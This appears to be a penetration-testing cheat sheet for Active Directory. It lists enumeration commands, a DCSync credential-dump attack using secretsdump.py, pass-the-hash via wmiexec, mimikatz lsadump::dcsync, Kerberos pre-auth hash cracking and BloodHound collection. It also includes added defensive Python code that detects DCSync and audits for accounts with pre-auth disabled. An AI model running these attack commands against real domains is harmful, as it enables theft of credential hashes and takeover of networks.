Active Directory

Active Directory is a directory service developed by Microsoft for Windows domain networks. It is included in most Windows Server operating systems as a set of processes and services. Initially, Active Directory was only in charge of centralized domain management.

-- Wikipedia

Target

  • Domain Admins group

  • Domain Controller

General

Display permissions using PowerShell

dsacls "DC=<domain>,DC=<domain>"

net

List local accounts

net user

List domain accounts

net user /domain

Details about specific user

net user <user> /domain

List domain groups

net group /domain

Show domain's account policy

net accounts

DC sync attack

DC Sync Attacks With Secretsdump.py - YouTube

secretsdump.py <domain>/<user>:<pw>@<ip>
wmiexec.py <domain>/<user>@<ip> -hashes "<hash>"

Alternative approach (probably gets flagged by AV): copy mimikatz.exe to the DC and execute it there

lsadump::dcsync
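Both the secretsdump.py and the mimikatz variants above work by asking a domain controller to replicate directory data, which a DC records as Event ID 4662 with the DS-Replication-Get-Changes rights in the Properties field. The following detection heuristic is an added example, not code from the original page or from Impacket/mimikatz: it parses a constructed key=value serialisation of 4662 fields (hypothetical hosts DC01/DC02 and accounts jdoe, svc_backup) and alerts when a principal other than a known DC machine account requests replication rights.

```python
"""Added example: flag DCSync-style replication requests in Windows security
events. Not part of the original page; the event format below is a constructed
key=value serialisation of Event ID 4662 fields, not a real log export."""
import re
from dataclasses import dataclass

# Control-access rights that directory replication needs. The GUIDs are the
# well-known AD schema values for these two extended rights.
REPLICATION_RIGHTS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes",
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes-All",
}

GUID_RE = re.compile(
    r"([0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12})", re.I
)

# Constructed sample events (hypothetical hosts and accounts).
SAMPLE_EVENTS = [
    "EventID=4662;SubjectUserName=DC02$;ObjectType=domainDNS;"
    "Properties={1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} {1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}",
    "EventID=4662;SubjectUserName=jdoe;ObjectType=domainDNS;"
    "Properties={1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} {1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}",
    "EventID=4662;SubjectUserName=svc_backup;ObjectType=user;"
    "Properties={bf967aba-0de6-11d0-a285-00aa003049e2}",
    "EventID=4624;SubjectUserName=jdoe;LogonType=3",
]

# Accounts allowed to replicate: the domain controllers' machine accounts
# (hypothetical names).
KNOWN_DC_ACCOUNTS = {"DC01$", "DC02$"}


@dataclass
class Alert:
    account: str
    rights: tuple
    raw: str


def parse_event(line):
    """Split a 'key=value;key=value' line into a dict."""
    fields = {}
    for part in line.split(";"):
        key, sep, value = part.partition("=")
        if sep:
            fields[key.strip()] = value.strip()
    return fields


def replication_rights(properties):
    """Return the replication rights named in a 4662 Properties field, in order."""
    return tuple(
        REPLICATION_RIGHTS[g.lower()]
        for g in GUID_RE.findall(properties)
        if g.lower() in REPLICATION_RIGHTS
    )


def detect_dcsync(lines, dc_accounts=KNOWN_DC_ACCOUNTS):
    """Alert on 4662 events that request replication rights from a non-DC principal."""
    allowed = {a.upper() for a in dc_accounts}
    alerts = []
    for line in lines:
        ev = parse_event(line)
        if ev.get("EventID") != "4662":
            continue
        rights = replication_rights(ev.get("Properties", ""))
        if not rights:
            continue
        account = ev.get("SubjectUserName", "")
        if account.upper() in allowed:
            continue  # DC-to-DC replication is normal traffic
        alerts.append(Alert(account, rights, line))
    return alerts


if __name__ == "__main__":
    for a in detect_dcsync(SAMPLE_EVENTS):
        print(f"DCSync suspect: {a.account} requested {', '.join(a.rights)}")
```

4662 is only written when "Audit Directory Service Access" is enabled and the domain object carries a SACL for these rights, so check that before relying on the rule; in a real environment the allow-list also needs any legitimate replication consumer (for example a directory-sync service account), otherwise it will fire on every sync cycle.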

Pre-Auth attack

Getting Passwords When Kerberos Pre-Auth IS Enabled - YouTube

  1. sniff the KRB auth packet

  2. crack it using hashcat

-> If no pre-auth is required, just use Impacket to pull the hashes from AD.
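Whether pre-auth is required is a per-account setting, the DONT_REQ_PREAUTH bit (0x400000) in the userAccountControl attribute. The audit below is an added example, not code from the original page or from Impacket: it decodes that attribute for constructed sample records (hypothetical accounts jdoe, svc_legacy, old_svc, app_svc) and lists the enabled accounts on which pre-auth should be switched back on; the LDAP filter constant is the standard bitwise-AND matching-rule query for pulling the same list from a real domain.

```python
"""Added example: find accounts with Kerberos pre-authentication disabled from
their userAccountControl value. Not part of the original page; the account
records are constructed sample data, not a real directory export."""

# userAccountControl bit flags (subset of the documented values).
ACCOUNTDISABLE = 0x0002
NORMAL_ACCOUNT = 0x0200
DONT_EXPIRE_PASSWORD = 0x10000
DONT_REQ_PREAUTH = 0x400000

UAC_FLAG_NAMES = {
    ACCOUNTDISABLE: "ACCOUNTDISABLE",
    NORMAL_ACCOUNT: "NORMAL_ACCOUNT",
    DONT_EXPIRE_PASSWORD: "DONT_EXPIRE_PASSWORD",
    DONT_REQ_PREAUTH: "DONT_REQ_PREAUTH",
}

# Equivalent LDAP filter using the bitwise-AND matching rule
# (1.2.840.113556.1.4.803), for any LDAP client against a real domain.
LDAP_FILTER_NO_PREAUTH = (
    "(&(objectCategory=person)(objectClass=user)"
    f"(userAccountControl:1.2.840.113556.1.4.803:={DONT_REQ_PREAUTH}))"
)

# Constructed sample records, shaped like an LDAP search result.
SAMPLE_ACCOUNTS = [
    {"sAMAccountName": "jdoe", "userAccountControl": NORMAL_ACCOUNT},
    {"sAMAccountName": "svc_legacy",
     "userAccountControl": NORMAL_ACCOUNT | DONT_REQ_PREAUTH},
    {"sAMAccountName": "old_svc",
     "userAccountControl": NORMAL_ACCOUNT | ACCOUNTDISABLE | DONT_REQ_PREAUTH},
    {"sAMAccountName": "app_svc",
     "userAccountControl": NORMAL_ACCOUNT | DONT_EXPIRE_PASSWORD},
]


def decode_uac(value):
    """Return the names of the known flags set in a userAccountControl value."""
    return [name for bit, name in UAC_FLAG_NAMES.items() if value & bit]


def preauth_disabled(accounts, include_disabled=False):
    """sAMAccountNames with pre-auth off; disabled accounts are skipped by default."""
    found = []
    for acct in accounts:
        uac = int(acct.get("userAccountControl", 0))
        if not uac & DONT_REQ_PREAUTH:
            continue
        if uac & ACCOUNTDISABLE and not include_disabled:
            continue
        found.append(acct["sAMAccountName"])
    return found


if __name__ == "__main__":
    print("LDAP filter:", LDAP_FILTER_NO_PREAUTH)
    for name in preauth_disabled(SAMPLE_ACCOUNTS):
        print(f"re-enable pre-auth for: {name}")
```

The fix for each listed account is to clear the flag (in PowerShell, Set-ADAccountControl with -DoesNotRequirePreAuth $false); disabled accounts are reported separately with include_disabled=True because they cannot be roasted but will become exposed the moment someone re-enables them.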

BloodHound

BloodHound uses graph theory to reveal the hidden and often unintended relationships within an Active Directory environment. GitHub - BloodHoundAD/BloodHound

Gather information (on target)

pip3 install bloodhound
bloodhound-python -u <username> -p <password> -ns <nameserver> -d <domain> -c All

OR

.\SharpHound.exe -c all -d <domain> --domaincontroller <dc-ip>

Copy generated *BloodHound.zip

OR

SharpHound.ps1
Invoke-BloodHound -Domain <domain> -LDAPUser <user> -LDAPPass <pass> -CollectionMethod All -DomainController <dc-ip>

Analyze data (on kali)

neo4j console
bloodhound

Connect to database

bolt://localhost:7687
neo4j
<PW>

Import data: Upload Data, then select the .csv, .json or .zip file(s)
